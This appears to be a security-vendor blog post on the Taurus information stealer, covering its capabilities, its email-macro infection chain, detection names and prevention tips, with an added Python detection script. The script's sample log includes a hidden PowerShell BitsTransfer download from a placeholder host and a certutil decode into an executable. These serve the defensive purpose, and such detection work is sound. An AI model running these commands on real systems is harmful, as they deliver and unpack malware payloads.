Taurus Stealer Gaining a Foothold

What is Taurus?

Taurus is an information-stealing malware developed by a cybercriminal group named “Predator the Thief”. It stands out from similar stealers because it includes techniques to evade sandbox detection; sandboxes are the isolated environments cybersecurity professionals use to test potentially malicious software. The group has been observed selling the Taurus stealer on dark web forums for $100, or offering to rebuild it with a new domain for $20.

This stealer is capable of stealing passwords, cookies, autofill form data, and browsing history from Chromium- and Gecko-based browsers. Taurus can also steal several popular cryptocurrency wallets and the credentials of commonly used FTP and email clients. Additionally, it can take screenshots and upload and execute further executables, so an infected device can be loaded with other malware such as keyloggers, ransomware, and cryptocurrency miners.

How does Taurus affect its victims?

According to Zscaler, this malware campaign was first observed in early June 2020 and has since affected many entities around the globe. Current statistics indicate that the USA, Canada, Denmark, and Great Britain are among the countries most affected by this campaign.

Much like a batch process, Taurus Stealer follows a fixed sequence of steps to compromise its victim.

  • The cybercriminals begin spreading this trojan by sending the victim a spam email with an attachment that contains malicious macro code for downloading further payloads onto the victim’s system.
  • Once the malicious attachment is opened and the macro code is enabled by the victim, a PowerShell script is executed that uses BitsTransfer to download three different files of the Taurus Project from GitHub.
  • After the files have been downloaded from GitHub, the Certutil.exe command-line program is used to decode the payload.
  • Finally, the malware starts stealing information and data from the victim’s machine.
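As an added example (not code from the original post, Cyble, or Zscaler), the delivery chain above expressed as detection logic run over constructed process-creation events. The key=value log format, host names, and download URL are assumptions made for the example, not real telemetry or IOCs.

```python
"""Detection logic for the Taurus delivery chain described above: an Office macro
spawns PowerShell, PowerShell fetches payload files with BitsTransfer, and
certutil.exe decodes the payload. Added example, not Cyble's or Zscaler's code;
the 'host= parent= image= cmdline=' line format is a constructed simplification
of process-creation telemetry, not a real Sysmon or EDR schema."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Office binaries whose child PowerShell is a strong macro-execution signal.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Order in which the two detectable stages appear on one host.
CHAIN = ("download", "decode")

LINE_RE = re.compile(r"^host=(\S+) parent=(\S+) image=(\S+) cmdline=(.*)$")


@dataclass
class ProcEvent:
    host: str
    parent: str
    image: str
    cmdline: str


def parse_events(text):
    """Parse the constructed log lines into ProcEvent objects, skipping malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(ProcEvent(*m.groups()))
    return events


def stage_of(ev):
    """Return the chain stage a single event matches, or None for activity that does not."""
    image, parent, cmd = ev.image.lower(), ev.parent.lower(), ev.cmdline.lower()
    if image == "powershell.exe" and parent in OFFICE_APPS and "bitstransfer" in cmd:
        return "download"  # macro-spawned PowerShell pulling files over BITS
    if image == "certutil.exe" and re.search(r"(^|\s)-decode(\s|$)", cmd):
        return "decode"    # certutil used as a decoder rather than a certificate tool
    return None


def flag_hosts(events):
    """Return hosts on which the download stage is followed by the decode stage."""
    progress = defaultdict(int)  # host -> index of the next expected stage
    flagged = set()
    for ev in events:
        stage = stage_of(ev)
        if stage is None or progress[ev.host] >= len(CHAIN):
            continue
        if stage == CHAIN[progress[ev.host]]:
            progress[ev.host] += 1
            if progress[ev.host] == len(CHAIN):
                flagged.add(ev.host)
    return sorted(flagged)


# Constructed sample telemetry: WS01 shows the full chain, WS02 shows benign
# PowerShell plus a legitimate certutil hash check, WS03 shows a decode with no
# preceding macro download. The download URL is a placeholder, not a real IOC.
SAMPLE_LOG = """\
host=WS01 parent=winword.exe image=powershell.exe cmdline=powershell -w hidden Import-Module BitsTransfer; Start-BitsTransfer -Source https://github.example/PLACEHOLDER/p.txt -Destination C:\\Users\\Public\\p.txt
host=WS01 parent=powershell.exe image=certutil.exe cmdline=certutil -decode C:\\Users\\Public\\p.txt C:\\Users\\Public\\p.exe
host=WS02 parent=explorer.exe image=powershell.exe cmdline=powershell Get-Process
host=WS02 parent=cmd.exe image=certutil.exe cmdline=certutil -hashfile C:\\setup.exe SHA256
host=WS03 parent=cmd.exe image=certutil.exe cmdline=certutil -decode C:\\tmp\\x.txt C:\\tmp\\x.exe
"""

if __name__ == "__main__":
    print(flag_hosts(parse_events(SAMPLE_LOG)))  # ['WS01']
```

Requiring the stages in order keeps a lone certutil decode (WS03) or a routine hash check (WS02) from firing on its own.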

This malware has been flagged under different detection names by many anti-virus products, such as Avast (detection name: Win32:CrypterX-gen [Trj]), Kaspersky (detection name: Trojan.Win32.Zudochka.ejq), and McAfee (GenericRXLN-PF!51823A980FF0), among others.

Below are some snapshots showing the Taurus dashboard, settings configuration, and log lists:

Taurus dashboard showing its impact level around the globe
Taurus settings configuration details
Taurus logs details

The IOCs related to the malware, including the relationships between them, are listed below:

Image depicting the malware spread

How to avoid the installation of malware?

To prevent any type of malware infection, users should always:

  • Be cautious when downloading files from the web or from emails sent by an unknown sender.
  • Install reputable antivirus tools on their systems to block these types of malware infections.
  • Download software only from official web pages and via direct download links.
  • Update and activate installed software only with tools provided by the official developers.
  • Regularly scan their systems for malware or any type of virus.

Some of the research articles have also detailed manual steps that can be used by victims to remove Taurus Stealer from their systems.

About Cyble

Cyble is an Atlanta, US-based, global premium cyber-security firm with tools and capabilities to provide near real-time cyber threat intelligence. 

Cyble Inc.’s mission is to provide organizations with a real-time view of their supply chain cyber threats and risks. Its SaaS-based solution, powered by machine learning and human analysis, gives organizations insights into the cyber threats introduced by suppliers and enables them to respond faster and more efficiently.

This monitoring and notification platform gives the average consumer insights into their personal cybersecurity issues, allowing them to take action as needed. Cyble was recently recognized by Forbes as one of the top 20 cyber-security companies to watch in 2020.
